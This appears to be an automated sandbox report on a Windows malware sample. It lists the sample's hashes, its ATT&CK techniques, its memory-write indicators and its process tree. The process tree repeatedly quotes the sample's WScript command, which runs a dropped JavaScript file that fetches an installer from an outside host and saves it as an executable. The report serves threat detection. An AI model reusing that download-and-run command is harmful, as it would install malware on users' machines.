c3ad4998a7e71d8855e646a8733829b5f91a38c8b207ac2779160257f09cbcf0

Analysis

max time kernel
122s
max time network
124s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
17/10/2024, 13:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe
Size

184KB
MD5

523f8192b8d4bf2f766bdb3523b1b42a
SHA1

64c84b0a83566294c134034b7bf9500384823bd5
SHA256

c3ad4998a7e71d8855e646a8733829b5f91a38c8b207ac2779160257f09cbcf0
SHA512

abbb41eaec3296f8bfcf2ee3081413ab3311450ef3ba26db77dad13f0fad14c1a4c4798565096920cb2386497e6f52cafe8465a1cc4a5138d98ebfd164712031
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3t:/7BSH8zUB+nGESaaRvoB7FJNndn8

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 14 IoCs

flow	pid	Process
6	2144	WScript.exe
8	2144	WScript.exe
9	2144	WScript.exe
10	2144	WScript.exe
11	2144	WScript.exe
14	1328	WScript.exe
15	1328	WScript.exe
17	1328	WScript.exe
19	1996	WScript.exe
20	1996	WScript.exe
22	2208	WScript.exe
23	2208	WScript.exe
25	2792	WScript.exe
26	2792	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2084 wrote to memory of 2144	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	30
PID 2084 wrote to memory of 2144	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	30
PID 2084 wrote to memory of 2144	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	30
PID 2084 wrote to memory of 2144	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	30
PID 2084 wrote to memory of 1328	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	32
PID 2084 wrote to memory of 1328	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	32
PID 2084 wrote to memory of 1328	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	32
PID 2084 wrote to memory of 1328	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	32
PID 2084 wrote to memory of 1996	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	34
PID 2084 wrote to memory of 1996	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	34
PID 2084 wrote to memory of 1996	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	34
PID 2084 wrote to memory of 1996	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	34
PID 2084 wrote to memory of 2208	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	36
PID 2084 wrote to memory of 2208	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	36
PID 2084 wrote to memory of 2208	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	36
PID 2084 wrote to memory of 2208	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	36
PID 2084 wrote to memory of 2792	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	38
PID 2084 wrote to memory of 2792	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	38
PID 2084 wrote to memory of 2792	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	38
PID 2084 wrote to memory of 2792	2084	523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\523f8192b8d4bf2f766bdb3523b1b42a_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2084
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2DE.js" http://www.djapp.info/?domain=ZHbMRobGQW.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2DE.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2144
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2DE.js" http://www.djapp.info/?domain=ZHbMRobGQW.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2DE.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1328
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2DE.js" http://www.djapp.info/?domain=ZHbMRobGQW.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2DE.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1996
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2DE.js" http://www.djapp.info/?domain=ZHbMRobGQW.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2DE.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2208
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2DE.js" http://www.djapp.info/?domain=ZHbMRobGQW.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2DE.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
9336386736264e9783bd4c248e0fdc90

SHA1
2f57befd41d48fefef13b6dbb903bcba3894537a

SHA256
aa45a95d8b5aeb9bba527c96fb37d08fb58843a3202888027020803e91cee811

SHA512
994f5ea3ae0a9dc08d701a15d845d98f086e69ca6b844ce8490652455202103b43fb3e1993791ee8753e6627b10e312aebe413e8c4feec76f4409cf637475391

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
be44b3f17865eec20ae45f7d0dedce9e

SHA1
b5938254ac8a47ca4ab9be8b86175e2b59702b03

SHA256
949d7c83434b24743762d62a23d6f6cda71d8ded31061ef69d686aa659e6ea2a

SHA512
88495bca5af99d474611304c8ca098bc09aaf75f25692ce7c4c64444d5d3d42ef723d7dd4ac69d1789d8f2f2b011f427e180650ea6ab521e38bd015555fce208

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LPQ313RR\domain_profile[1].htm

Filesize
40KB

MD5
e8f1708f45718ca21b4a86bfb1c20014

SHA1
f8b6db976165323179894d933307c34b4e5ec3e4

SHA256
3f9593a643bfdafb2dee6c34a7271a178b9ac41018271277415d68ff11d4c946

SHA512
cfc111e480b6f830aacf74282acd344eed9b5c63c1520ab0bef19233f6ee829a44dfbe745bd1f1ad50f135e227ebfbd7d8083f80875dab0b8b475c82335f8a06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\domain_profile[1].htm

Filesize
6KB

MD5
fdfd06d4db37f8d16b6ad46f542053e6

SHA1
a2de436a3b41acf83bb4670d958f28ba000b8124

SHA256
94ebf736102e03707f349dc19518f4fa143a7adf96ec83bf01631f8e1df80435

SHA512
a73c10175b510d636d4e37abaa143c7c11130fab682754a78aa30f75f01b6ab13f90b41f0a26a6f73eb5fa828f2bf3dd68841f21debd6f2d245656753a8f2eba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\domain_profile[1].htm

Filesize
6KB

MD5
625ebc1cdc4cb598188f2ade47e5d3cb

SHA1
abf83ac422062484d7af9bd40e35cbb30468531c

SHA256
5cf999d6aaa338b4b30982632b0a31cef1d6c757bf78ee666137c7bce791a46a

SHA512
aff5e8ccdc0f685af4fc881dc64acb2f102e9f476b042112ca39745438f6dd1e48d0abc51c07817889ff1c67a3e7bf14f8e2384dbccd943374e36382a4330781

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF670.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarEC1.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf2DE.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\7N4LJEQW.txt

Filesize
173B

MD5
64d6c5ba429670083afcf7d4be1a1146

SHA1
5f4e4fadee6f25e1e26d3939825e772d32549e74

SHA256
90f0d7462fb9465f18eabb98b98a2a976ff6874d4bacc7ad8077ce93cac1d88d

SHA512
4c160e82214e1c3a7b065370291ee3c5dae8e33b74224d40c71b9f1cf4dca0e27cad5e52fead39c477a1ee9fd50471d46d0c29de7322549c7f764d2953a6a0b1

Download Submit